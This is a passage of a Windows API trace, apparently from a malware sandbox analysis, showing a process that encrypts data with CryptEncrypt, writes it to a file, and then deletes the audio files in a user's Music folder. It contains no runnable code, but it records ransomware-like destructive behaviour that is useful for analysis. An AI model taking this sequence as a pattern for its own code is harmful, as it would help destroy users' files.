returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.209] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0206.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0206.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0206.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0206.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab0b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0206.211] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0206.211] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0206.211] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.211] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0206.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab098, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0206.211] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72748*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72748*, pdwDataLen=0x8cef60*=0x8) returned 1 [0206.211] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0206.211] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0206.211] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0206.211] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0206.211] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.211] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.213] WriteFile (in: hFile=0x50c, lpBuffer=0x2a72748*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72748*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0206.214] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0206.214] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0206.214] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.214] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.214] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0206.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaade0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0206.214] CryptDestroyKey (hKey=0x9e2138) returned 1 [0206.214] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0206.214] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0206.214] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0206.214] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0206.214] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.214] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.214] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0206.214] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0206.214] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0206.214] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0206.215] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.215] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.215] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.215] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.215] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0206.215] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0206.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0206.215] CryptReleaseContext (hProv=0xa7c330, dwFlags=0x0) returned 1 [0206.215] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.215] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.215] FreeLibrary (hLibModule=0x76390000) returned 1 [0206.215] CloseHandle (hObject=0x50c) returned 1 [0206.216] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.216] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0206.216] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV", lpFilePart=0x8cedf4*="LWx-lTCW5BQnV") returned 0x23 [0206.216] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv")) returned 0x10 [0206.216] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b56c6e0, ftCreationTime.dwHighDateTime=0x1d5ccdb, ftLastAccessTime.dwLowDateTime=0xc000e480, ftLastAccessTime.dwHighDateTime=0x1d5d46f, ftLastWriteTime.dwLowDateTime=0xc000e480, ftLastWriteTime.dwHighDateTime=0x1d5d46f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1eb8 [0206.216] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b56c6e0, ftCreationTime.dwHighDateTime=0x1d5ccdb, ftLastAccessTime.dwLowDateTime=0xc000e480, ftLastAccessTime.dwHighDateTime=0x1d5d46f, ftLastWriteTime.dwLowDateTime=0xc000e480, ftLastWriteTime.dwHighDateTime=0x1d5d46f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0206.216] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b3c12c0, ftCreationTime.dwHighDateTime=0x1d5d653, ftLastAccessTime.dwLowDateTime=0x219dfc60, ftLastAccessTime.dwHighDateTime=0x1d5cc8b, ftLastWriteTime.dwLowDateTime=0x219dfc60, ftLastWriteTime.dwHighDateTime=0x1d5cc8b, nFileSizeHigh=0x0, nFileSizeLow=0x14744, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="enI zKZoJYU8c8LOk6.mp3", cAlternateFileName="ENIZKZ~1.MP3")) returned 1 [0206.216] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV\\enI zKZoJYU8c8LOk6.mp3" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv\\eni zkzojyu8c8lok6.mp3")) returned 1 [0206.223] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9da9b3e0, ftCreationTime.dwHighDateTime=0x1d5d149, ftLastAccessTime.dwLowDateTime=0xd0308880, ftLastAccessTime.dwHighDateTime=0x1d5cbad, ftLastWriteTime.dwLowDateTime=0xd0308880, ftLastWriteTime.dwHighDateTime=0x1d5cbad, nFileSizeHigh=0x0, nFileSizeLow=0xf716, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="oOe-fJ52 hjoZsZuXL.mp3", cAlternateFileName="OOE-FJ~1.MP3")) returned 1 [0206.223] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV\\oOe-fJ52 hjoZsZuXL.mp3" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv\\ooe-fj52 hjozszuxl.mp3")) returned 1 [0206.225] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1571a90, ftCreationTime.dwHighDateTime=0x1d5cf44, ftLastAccessTime.dwLowDateTime=0x468dba80, ftLastAccessTime.dwHighDateTime=0x1d5d549, ftLastWriteTime.dwLowDateTime=0x468dba80, ftLastWriteTime.dwHighDateTime=0x1d5d549, nFileSizeHigh=0x0, nFileSizeLow=0x4e5d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="p4c4k7H5z6Yu.m4a", cAlternateFileName="P4C4K7~1.M4A")) returned 1 [0206.225] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV\\p4c4k7H5z6Yu.m4a" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv\\p4c4k7h5z6yu.m4a")) returned 1 [0206.227] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4177bd0, ftCreationTime.dwHighDateTime=0x1d5d4d8, ftLastAccessTime.dwLowDateTime=0x6715890, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x6715890, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xa901, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="RL8HFk.wav", cAlternateFileName="")) returned 1 [0206.227] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV\\RL8HFk.wav" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv\\rl8hfk.wav")) returned 1 [0206.230] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914c1b90, ftCreationTime.dwHighDateTime=0x1d5cb1a, ftLastAccessTime.dwLowDateTime=0xc15d5410, ftLastAccessTime.dwHighDateTime=0x1d5d2aa, ftLastWriteTime.dwLowDateTime=0xc15d5410, ftLastWriteTime.dwHighDateTime=0x1d5d2aa, nFileSizeHigh=0x0, nFileSizeLow=0xb88d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="t64zgXWsP.mp3", cAlternateFileName="T64ZGX~1.MP3")) returned 1 [0206.230] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV\\t64zgXWsP.mp3" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv\\t64zgxwsp.mp3")) returned 1 [0206.236] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9998b5b0, ftCreationTime.dwHighDateTime=0x1d5d44d, ftLastAccessTime.dwLowDateTime=0xafcf4980, ftLastAccessTime.dwHighDateTime=0x1d5d582, ftLastWriteTime.dwLowDateTime=0xafcf4980, ftLastWriteTime.dwHighDateTime=0x1d5d582, nFileSizeHigh=0x0, nFileSizeLow=0xf56b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="TdgGUrCNY0j6bdbAX.wav", cAlternateFileName="TDGGUR~1.WAV")) returned 1 [0206.236] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV\\TdgGUrCNY0j6bdbAX.wav" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv\\tdggurcny0j6bdbax.wav")) returned 1 [0206.238] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ca6c120, ftCreationTime.dwHighDateTime=0x1d5cd64, ftLastAccessTime.dwLowDateTime=0xdc76b170, ftLastAccessTime.dwHighDateTime=0x1d5ce1c, ftLastWriteTime.dwLowDateTime=0xdc76b170, ftLastWriteTime.dwHighDateTime=0x1d5ce1c, nFileSizeHigh=0x0, nFileSizeLow=0x16fcb, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="W8d_.m4a", cAlternateFileName="")) returned 1 [0206.238] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV\\W8d_.m4a" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv\\w8d_.m4a")) returned 1 [0206.244] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf072f70, ftCreationTime.dwHighDateTime=0x1d5d083, ftLastAccessTime.dwLowDateTime=0x50965030, ftLastAccessTime.dwHighDateTime=0x1d5d1bd, ftLastWriteTime.dwLowDateTime=0x50965030, ftLastWriteTime.dwHighDateTime=0x1d5d1bd, nFileSizeHigh=0x0, nFileSizeLow=0x502c, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="_ifyIiX6lCVUdmJe4.wav", cAlternateFileName="_IFYII~1.WAV")) returned 1 [0206.244] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV\\_ifyIiX6lCVUdmJe4.wav" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv\\_ifyiix6lcvudmje4.wav")) returned 1 [0206.249] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf072f70, ftCreationTime.dwHighDateTime=0x1d5d083, ftLastAccessTime.dwLowDateTime=0x50965030, ftLastAccessTime.dwHighDateTime=0x1d5d1bd, ftLastWriteTime.dwLowDateTime=0x50965030, ftLastWriteTime.dwHighDateTime=0x1d5d1bd, nFileSizeHigh=0x0, nFileSizeLow=0x502c, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="_ifyIiX6lCVUdmJe4.wav", cAlternateFileName="_IFYII~1.WAV")) returned 0 [0206.249] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0206.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74ab8 | out: hHeap=0x2af0000) returned 1 [0206.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0206.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0206.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.250] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0206.250] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0206.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0206.251] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0206.251] HeapFree 